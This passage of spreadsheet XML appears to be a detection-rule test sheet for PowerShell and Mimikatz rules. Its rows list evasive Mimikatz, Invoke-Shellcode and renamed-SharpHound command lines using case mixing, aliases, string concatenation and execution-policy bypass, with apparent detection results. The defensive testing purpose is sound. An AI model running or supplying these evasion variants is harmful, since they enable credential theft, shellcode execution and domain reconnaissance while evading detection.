          <t>powershell.exe -cOmmANd "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F2698" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2698" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2698" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I269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8" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2698" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2699" ht="15.75" customHeight="1" s="42">
      <c r="A2699" s="43" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B2699" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2699" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2699" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2699" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -CoMMaNd "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F2699" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2699" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2699" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I269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699" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2699" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2700" ht="15.75" customHeight="1" s="42">
      <c r="A2700" s="43" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B2700" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2700" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2700" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2700" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -comMAnD "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F2700" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2700" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2700" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I270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0" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2700" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2701" ht="15.75" customHeight="1" s="42">
      <c r="A2701" s="43" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B2701" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2701" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2701" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2701" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "$c = 'Invoke-Mimikatz'; Invoke-Expression $c"</t>
        </is>
      </c>
      <c r="F2701" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2701" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2701" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I270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1" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2701" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2702" ht="15.75" customHeight="1" s="42">
      <c r="A2702" s="43" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B2702" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2702" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2702" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2702" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COMmAnd "$c = 'Invoke-Mimikatz'; Invoke-Expression $c"</t>
        </is>
      </c>
      <c r="F2702" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2702" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2702" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I270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2" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2702" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2703" ht="15.75" customHeight="1" s="42">
      <c r="A2703" s="43" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B2703" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2703" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2703" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2703" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOMmAnd "$c = 'Invoke-Mimikatz'; Invoke-Expression $c"</t>
        </is>
      </c>
      <c r="F2703" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2703" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2703" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I270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3" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2703" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2704" ht="15.75" customHeight="1" s="42">
      <c r="A2704" s="43" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B2704" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2704" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2704" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2704" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ComMAnD "$c = 'Invoke-Mimikatz'; Invoke-Expression $c"</t>
        </is>
      </c>
      <c r="F2704" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2704" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2704" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I270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4" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2704" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2705" ht="15.75" customHeight="1" s="42">
      <c r="A2705" s="43" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B2705" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2705" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2705" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2705" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOMMand "$c = 'Invoke-Mimikatz'; Invoke-Expression $c"</t>
        </is>
      </c>
      <c r="F2705" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2705" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2705" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I270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5" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2705" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2706" ht="15.75" customHeight="1" s="42">
      <c r="A2706" s="43" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B2706" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2706" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2706" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2706" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "$c = 'Invoke-Mimikatz'; Invoke-Expression $c"</t>
        </is>
      </c>
      <c r="F2706" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2706" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2706" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I270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6" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2706" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2707" ht="15.75" customHeight="1" s="42">
      <c r="A2707" s="43" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B2707" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2707" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2707" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2707" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COmMANd "$c = 'Invoke-Mimikatz'; Invoke-Expression $c"</t>
        </is>
      </c>
      <c r="F2707" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2707" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2707" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I270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7" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2707" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2708" ht="15.75" customHeight="1" s="42">
      <c r="A2708" s="43" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B2708" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2708" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2708" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2708" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Set-Alias -Name 'NotMalicious' -Value 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F2708" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2708" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2708" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I270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8" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2708" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2709" ht="15.75" customHeight="1" s="42">
      <c r="A2709" s="43" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B2709" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2709" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2709" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2709" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "Set-Alias -Name 'NotMalicious' -Value 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F2709" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2709" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2709" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I270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09" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2709" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2710" ht="15.75" customHeight="1" s="42">
      <c r="A2710" s="43" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B2710" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2710" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2710" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2710" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOmmand "Set-Alias -Name 'NotMalicious' -Value 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F2710" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2710" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2710" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I271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10" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2710" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2711" ht="15.75" customHeight="1" s="42">
      <c r="A2711" s="43" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B2711" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2711" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2711" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2711" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COmmaND "Set-Alias -Name 'NotMalicious' -Value 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F2711" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2711" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2711" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I271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11" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2711" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2712" ht="15.75" customHeight="1" s="42">
      <c r="A2712" s="43" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B2712" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2712" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2712" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2712" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -command "Set-Alias -Name 'NotMalicious' -Value 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F2712" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2712" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2712" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I271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12" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2712" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2713" ht="15.75" customHeight="1" s="42">
      <c r="A2713" s="43" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B2713" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2713" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2713" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2713" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COmmanD "Set-Alias -Name 'NotMalicious' -Value 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F2713" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2713" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2713" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I271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13" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2713" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2714" ht="15.75" customHeight="1" s="42">
      <c r="A2714" s="43" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B2714" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2714" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2714" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2714" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOMmaNd "Set-Alias -Name 'NotMalicious' -Value 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F2714" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2714" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2714" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I271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14" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2714" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2715" ht="15.75" customHeight="1" s="42">
      <c r="A2715" s="43" t="inlineStr">
        <is>
          <t>t1069.001</t>
        </is>
      </c>
      <c r="B2715" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_bloodhound_sharphound</t>
        </is>
      </c>
      <c r="C2715" s="44" t="inlineStr">
        <is>
          <t>HackTool - Bloodhound/Sharphound Execution</t>
        </is>
      </c>
      <c r="D2715" s="44" t="inlineStr">
        <is>
          <t>f376c8a7-a2d0-4ddc-aa0c-16c17236d962</t>
        </is>
      </c>
      <c r="E2715" s="44" t="inlineStr">
        <is>
          <t>copy SharpHound.exe not_suspicious.exe; .\not_suspicious.exe --collectionmethods="All" --domain "contoso.local"</t>
        </is>
      </c>
      <c r="F2715" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2715" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2715" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2715" s="43" t="n"/>
      <c r="J2715" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K2715" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2716" ht="15.75" customHeight="1" s="42">
      <c r="A2716" s="43" t="inlineStr">
        <is>
          <t>t1069.001</t>
        </is>
      </c>
      <c r="B2716" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_bloodhound_sharphound</t>
        </is>
      </c>
      <c r="C2716" s="44" t="inlineStr">
        <is>
          <t>HackTool - Bloodhound/Sharphound Execution</t>
        </is>
      </c>
      <c r="D2716" s="44" t="inlineStr">
        <is>
          <t>f376c8a7-a2d0-4ddc-aa0c-16c17236d962</t>
        </is>
      </c>
      <c r="E2716" s="44" t="inlineStr">
        <is>
          <t>copy SharpHound.exe not_suspicious.exe; .\not_suspicious.exe --collectionmethods "Default" --domain "contoso.local" --zipfilename:"data.zip"</t>
        </is>
      </c>
      <c r="F2716" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2716" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2716" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2716" s="44" t="n"/>
      <c r="J2716" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K2716" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2717" ht="15.75" customHeight="1" s="42">
      <c r="A2717" s="43" t="inlineStr">
        <is>
          <t>t1069.001</t>
        </is>
      </c>
      <c r="B2717" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_bloodhound_sharphound</t>
        </is>
      </c>
      <c r="C2717" s="44" t="inlineStr">
        <is>
          <t>HackTool - Bloodhound/Sharphound Execution</t>
        </is>
      </c>
      <c r="D2717" s="44" t="inlineStr">
        <is>
          <t>f376c8a7-a2d0-4ddc-aa0c-16c17236d962</t>
        </is>
      </c>
      <c r="E2717" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /"c" SharpHound.exe -jsOnFolDEr C:\temp /"ZipFileName" C:\temp\sharphound.zip</t>
        </is>
      </c>
      <c r="F2717" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2717" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2717" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2717" s="43" t="n"/>
      <c r="J2717" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2717" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2718" ht="15.75" customHeight="1" s="42">
      <c r="A2718" s="43" t="n"/>
      <c r="B2718" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2718" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2718" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2718" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "iex ('Invoke-' + 'Shell' + 'code')"</t>
        </is>
      </c>
      <c r="F2718" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2718" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2718" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2718" s="44" t="n"/>
      <c r="J2718" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2718" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2719" ht="15.75" customHeight="1" s="42">
      <c r="A2719" s="43" t="n"/>
      <c r="B2719" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2719" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2719" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2719" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "iex ('Invoke-' + 'Shell' + 'code')"</t>
        </is>
      </c>
      <c r="F2719" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2719" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2719" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2719" s="44" t="n"/>
      <c r="J2719" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2719" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2720" ht="15.75" customHeight="1" s="42">
      <c r="A2720" s="43" t="n"/>
      <c r="B2720" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2720" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2720" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2720" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -C "iex ('Invoke-' + 'Shell' + 'code')"</t>
        </is>
      </c>
      <c r="F2720" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2720" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2720" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2720" s="44" t="n"/>
      <c r="J2720" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2720" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2721" ht="15.75" customHeight="1" s="42">
      <c r="A2721" s="43" t="n"/>
      <c r="B2721" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2721" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2721" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2721" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy Bypass -Command "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F2721" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2721" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2721" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I272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21" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2721" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2722" ht="15.75" customHeight="1" s="42">
      <c r="A2722" s="43" t="n"/>
      <c r="B2722" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2722" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2722" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2722" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -eXeCuTioNpOLICY Bypass -c "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F2722" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2722" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2722" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I272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22" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2722" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2723" ht="15.75" customHeight="1" s="42">
      <c r="A2723" s="43" t="n"/>
      <c r="B2723" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2723" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2723" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2723" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -coMmAnd "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F2723" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2723" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2723" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I272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23" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2723" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2724" ht="15.75" customHeight="1" s="42">
      <c r="A2724" s="43" t="n"/>
      <c r="B2724" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2724" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2724" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2724" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -c "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F2724" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2724" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2724" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I272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24" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2724" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2725" ht="15.75" customHeight="1" s="42">
      <c r="A2725" s="43" t="n"/>
      <c r="B2725" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2725" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2725" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2725" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -eXECutIoNpolIcy Bypass -c "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F2725" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2725" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2725" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I272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25" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2725" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2726" ht="15.75" customHeight="1" s="42">
      <c r="A2726" s="43" t="n"/>
      <c r="B2726" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2726" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2726" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2726" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -cOmmAnD "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F2726" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2726" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2726" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I272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26" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2726" s="44" t="b">
        <v>0</v>
      </c>
    </row>
